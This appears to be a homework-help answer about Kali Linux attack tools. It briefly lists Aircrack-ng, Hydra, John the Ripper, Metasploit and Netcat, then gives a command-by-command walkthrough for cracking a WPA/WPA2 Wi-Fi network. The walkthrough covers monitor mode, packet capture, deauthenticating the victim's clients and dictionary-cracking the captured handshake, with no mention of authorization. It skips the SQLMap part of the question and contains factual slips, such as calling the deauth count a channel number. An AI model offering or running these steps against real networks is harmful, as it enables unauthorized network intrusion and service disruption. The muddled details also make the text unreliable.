Question

Discuss applications on Kali Linux that can be used to conduct an attack. Provide information on a specific tool such as SQL Map and steps that an attacker could use to carry out a successful attack.

Answer 1

Kali Linux is one of the most recommended operating system for ethical hacking and penetration testing. It's very feature-rich and comes with many in-built tools which will make your task easier when it comes to literally anything regarding digital forensics.Some of the tools are listed below :

1. Aircrack-ng - Aircrack-ng is one of the finest wireless password hack tools for WEP/WAP/WPA2 cracking used worldwide.

2. THC Hydra - THC Hydra tool operates on the basis of brute force attack to crack virtually any remote authentication service. THX Hydra offers rapid dictionary attacks for 50+ protocols including ftp, https, telnet, etc.

3. John the Ripper - John the Ripper is one of the prominent cracking tool utilized for penetration testing.

4.Metasploit Framework - Metasploit Framework is an open source framework with which security experts and teams use to identify vulnerabilities as well as run security loopholes in the system in order to achieve better security.

5. Netcat - Netcat(nc) is a network utility tool which can use TCP/IP protocols to read and write data across network connections.

Aircrack-ng

Aircrack-ng is one of the finest wireless password hack tools for WEP/WAP/WPA2 cracking used worldwide.

It operates by capturing packets in the network, analyses it with the help of the recovered passwords. It also features a console interface.  Additionally, Aircrack-ng also utilizes FMS (Fluhrer, Mantin, and Shamir) attack alongside with some optimizations like the KoreK attacks and PTW attack to accelerate the cracking process which is faster than the WEP.

Detailed step-by-step approach to successfully crack WPA/WPA-2 Wi-Fi using Aircrack-ng on Kali Linux :

Step 1 : Open terminal. Type iwconfig to know the name of the wireless adapter connected to the PC. It is generally the name of wlan0 or wlan1/wlan2 if the PC is connected to external wireless card

Step 2 : Type airmon-ng check kill to avoid error messages on the next step(Step 3)

Step 3: To enable the monitor mode on the wireless card, type airmon-ng start wlan0 (interface of wireless card). To monitor the wlan,  use wlan0mon in terminal

Step 4 : Type  airodump-ng wlan0mon,to display all the AP's in your surroundings and also the clients connected to that AP's.

It captures the packets in the air. This will accumulate data from the wireless packets in the air.

Note : Do not close this terminal. It will be used to know whether WPA has been captured or not.

Step 5 : Type airodump-ng -c 6 --bssid XX.XX.XX.XX.XX.XX -w /root/Desktop/captureddata wlan0mon

--bssid of the victim targeted from "airodump-ng wlan0mon" terminal screen

-c channel number of the victim targetd from "airodump-ng wlan0mon" terminal screen

-w is used for writing the captured data from the victim to a file path specified.

interface - in this case wlan0mon

Step 6 : Next step is to de-authenticate the connected clients to the Wi-Fi. Type

aireplay-ng --deauth 6 -a XX.XX.XX.XX.XX.XX wlan0mon

6 is the channel number

-a XX.XX.XX.XX.XX.XX is the router bssid

wlan0mon is the interface monitor name

This command will disconnect all the clients from access point.

Use -c <mac address of victim> to de-authenticate a particular target/victim.

After this usually the client attempts to connect to the Wi-Fi again. At that time, we will capture the packets which sends from client. From this result, we will get APA handshake.

Step 7: This is the final step where we actually start cracking the Wi-Fi with captured packets command for this is

aircrack-ng -b XX.XX.XX.XX.XX.XX -w /root/Desktop/wordlist.txt  /root/Desktop/captureddata.cap

-b XX.XX.XX.XX.XX.XX is the bssid of the router

-w [path to wordlist] [path to write the captured data]

wordlist is important.you can download a wordlist file available on the internet

Now press enter and Aircrack will initiate the cracking process.

Thanks!

Upvote if it helped!